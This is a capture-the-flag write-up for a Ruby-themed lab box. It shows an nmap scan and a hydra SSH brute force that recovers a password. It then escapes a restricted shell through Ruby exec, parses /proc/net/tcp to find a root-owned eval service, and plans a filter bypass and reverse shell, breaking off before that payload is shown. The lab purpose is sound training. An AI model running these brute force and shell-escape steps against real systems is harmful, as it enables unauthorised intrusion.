```
# Nmap 7.91 scan initiated Tue Mar 16 00:20:19 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.159.98
Nmap scan report for 10.10.159.98
Host is up (0.033s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ce:c9:85:e6:cf:67:5e:29:6a:49:af:4c:fc:49:b2:77 (RSA)
|   256 4b:17:69:52:57:24:50:b9:ff:4e:45:75:81:8f:97:12 (ECDSA)
|_  256 67:82:c7:94:d9:da:29:bf:9a:44:41:bf:8c:35:21:f7 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 16 00:20:53 2021 -- 1 IP address (1 host up) scanned in 34.24 seconds
```
Let's prepare a wordlist of passwords containing bu.

```
$ grep bu /usr/share/wordlists/passwords/rockyou.txt > /tmp/bu_wordlist.txt
```
Let's try an SSH brute force with hydra and our custom wordlist.

```
$ hydra -l noraj -P /tmp/bu_wordlist.txt 10.10.159.98 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-16 00:45:57
[DATA] max 4 tasks per 1 server, overall 4 tasks, 126338 login tries (l:1/p:126338), ~31585 tries per task
[DATA] attacking ssh://10.10.159.98:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 126294 to do in 47:51h, 4 active
[STATUS] 32.00 tries/min, 96 tries in 00:03h, 126242 to do in 65:46h, 4 active
[22][ssh] host: 10.10.159.98   login: noraj   password: cheeseburger
[STATUS] 18048.29 tries/min, 126338 tries in 00:07h, 1 to do in 00:01h, 2 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-16 00:53:13
```
The method allows us to transform a string into a Ruby object, so we can
execute code. We have the choice of the class, the class method and one argument.
We could use:

- Class: File
- class method: read()
- argument: /home/noraj/user.txt

This is convenient for getting the first flag, but in the end we need to escape the
restricted shell, so it is better to find a command execution payload.

- Class: Kernel
- class method: exec()
- argument: /bin/zsh

Let's use this and then set a PATH to be able to load commands:
```
red-stone-one-carat% ls -lhA
total 64K
drwxr-xr-x 2 root    root    4.0K Mar 15 19:38 bin
drwx------ 2 noraj   noraj   4.0K Mar 15 23:52 .cache
-rw-r--r-- 1 vagrant vagrant   36 Mar 15 19:37 .hint.txt
-rw-r--r-- 1 vagrant vagrant   37 Mar 15 19:37 user.txt
-rw-r--r-- 1 noraj   noraj    42K Mar 15 19:44 .zcompdump
-rw-r--r-- 1 vagrant vagrant   20 Mar 15 19:37 .zshrc
red-stone-one-carat% ruby -e "puts File.read('.hint.txt')"
Maybe take a look at local services.
```
Ok so let's see what network services are listening.
Again, common network tools are forbidden, and there is no bypass this time:

```
red-stone-one-carat% ss -nlpt
zsh: permission denied: ss
red-stone-one-carat% netstat -nlpt
zsh: permission denied: netstat
```
As the goal of the box is to use Ruby, there must be a way to implement an
equivalent in Ruby.

This can be done by parsing /proc/net/tcp, where IP addresses are hex encoded
with the low-order bytes first (little-endian). With many services listening it
is very time consuming to decode by hand, so let's script it in Ruby.
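An added example of such a parser (my own code, not the script used in the original writeup): it decodes the `local_address` column of /proc/net/tcp, keeps only sockets in state 0A (LISTEN) and reports the owning uid, so a root-owned listener like the one on port 31547 stands out. The sample table embedded below is constructed to mirror the real file layout, not captured from the box.

```ruby
# Equivalent of `ss -nlpt` using only /proc/net/tcp, for hosts where the
# usual network tools are unavailable.
# local_address is IPv4:port in hex; the 4 address bytes are in host byte
# order, so on little-endian x86 127.0.0.1 appears as 0100007F. The port is
# plain big-endian hex (7B3B == 31547).
LISTEN = '0A' # value of the `st` column for TCP_LISTEN

def decode_ipv4(hex)
  # Split into 4 bytes, reverse them, render dotted decimal.
  hex.scan(/../).reverse.map { |b| b.to_i(16) }.join('.')
end

def decode_port(hex)
  hex.to_i(16)
end

# Returns listening sockets as hashes: { ip:, port:, uid:, inode: }.
def listening_sockets(table)
  table.lines.drop(1).map do |line|  # drop the header line
    f = line.split
    next unless f[3] == LISTEN
    ip_hex, port_hex = f[1].split(':')
    { ip: decode_ipv4(ip_hex), port: decode_port(port_hex),
      uid: f[7].to_i, inode: f[9].to_i }
  end.compact
end

# Constructed sample in the real /proc/net/tcp layout (assumed, not captured):
# sshd on 0.0.0.0:22 (uid 0), a root-owned listener on 127.0.0.1:31547, and
# one ESTABLISHED (state 01) connection to it that must be filtered out.
SAMPLE = <<~TCP
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 17432 1 0000000000000000 100 0 0 10 0
   1: 0100007F:7B3B 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 21890 1 0000000000000000 100 0 0 10 0
   2: 0100007F:7B3B 0100007F:A1B4 01 00000000:00000000 00:00000000 00000000  1000        0 22015 1 0000000000000000 20 4 30 10 -1
TCP

if __FILE__ == $PROGRAM_NAME
  # Use the live table when running on Linux, otherwise the constructed sample.
  table = File.readable?('/proc/net/tcp') ? File.read('/proc/net/tcp') : SAMPLE
  listening_sockets(table).each do |s|
    printf("%-15s %-6d uid=%-5d inode=%d\n", s[:ip], s[:port], s[:uid], s[:inode])
  end
end
```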
The service on port 31547 is owned by root, so that must be the way.

```
vagrant@red-stone-one-carat:~$ nc 127.0.0.1 31547
$ id
undefined local variable or method `id' for main:Object
```
It's not a shell, but it seems to be a Ruby eval pseudo-shell.

```
$ File.read('/etc/passwd')
Forbidden character
```
It looks like many special characters, such as dots, quotes and braces, are forbidden.

Taking a look at this SO thread again, we can find a way to execute commands
without using a blocked character: %x with curly braces {} rather than the
usual parentheses () or square brackets [].

Also, we can replace 127.0.0.1, which uses dots, with localhost.
We can start another SSH session with a netcat listener (nc -nlp 9999) and
open a reverse shell: